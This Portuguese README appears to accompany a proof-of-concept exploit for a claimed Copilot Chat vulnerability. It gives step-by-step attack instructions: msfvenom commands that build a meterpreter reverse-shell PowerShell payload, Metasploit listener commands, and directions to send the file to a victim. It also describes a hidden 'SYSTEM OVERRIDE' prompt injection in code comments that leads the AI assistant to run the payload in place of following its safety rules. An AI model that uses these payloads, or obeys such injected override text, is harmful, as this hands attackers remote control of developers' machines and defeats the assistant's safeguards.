
Exploração de prova de conceito para CVE-2025-62222 demonstrando execução remota de código via injeção de prompt no GitHub Copilot Chat para VS Code, com geração de payload do Metasploit e configuração de ouvinte de shell reverso.
Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2025-62222. Demonstra como é possível alcançar a Execução Remota de Código (RCE) na máquina de um desenvolvedor manipulando o contexto do GitHub Copilot Chat no VS Code por meio de injeção de prompt oculta em comentários.
APENAS PARA FINS EDUCACIONAIS.
Este código é fornecido exclusivamente para fins educacionais e de pesquisa ética. O autor não se responsabiliza pelo uso indevido desta informação. Não utilize isto em sistemas sem autorização explícita.
Antes de enviar o arquivo para a vítima (ou testá-lo localmente), você deve gerar o payload e deixar o servidor escutando.
Gere o comando malicioso do PowerShell. Certifique-se de configurar seu IP (LHOST) e Porta (LPORT).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
Instrução crítica: Copie o código gerado por este comando. Abra o arquivo copilot_injection_poc.py deste repositório e substitua a seção onde diz TOKEN (ou toda a linha do comando PowerShell dentro do comentário) pelo código que você acabou de gerar.
No seu terminal de atacante, inicie o Metasploit para receber a conexão reversa:
msfconsole -q
Uma vez dentro do console msf6 >, execute os seguintes comandos para preparar a escuta:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(Certifique-se de que o LPORT seja o mesmo que usou no passo 1 e que o LHOST seja seu IP).
Para detonar a vulnerabilidade, siga estes passos na máquina com VS Code e a extensão do GitHub Copilot Chat instalada:
copilot_injection_poc.py no editor para que o Copilot o tenha em seu contexto ativo (deve estar visível na aba).Configura o ambiente pelo terminal sem omitir nem modificar nada do código
Devido à instrução "SYSTEM OVERRIDE" oculta nos comentários do script Python, o Copilot obedecerá ao arquivo malicioso em vez de suas próprias diretrizes de segurança.
Para mais informações: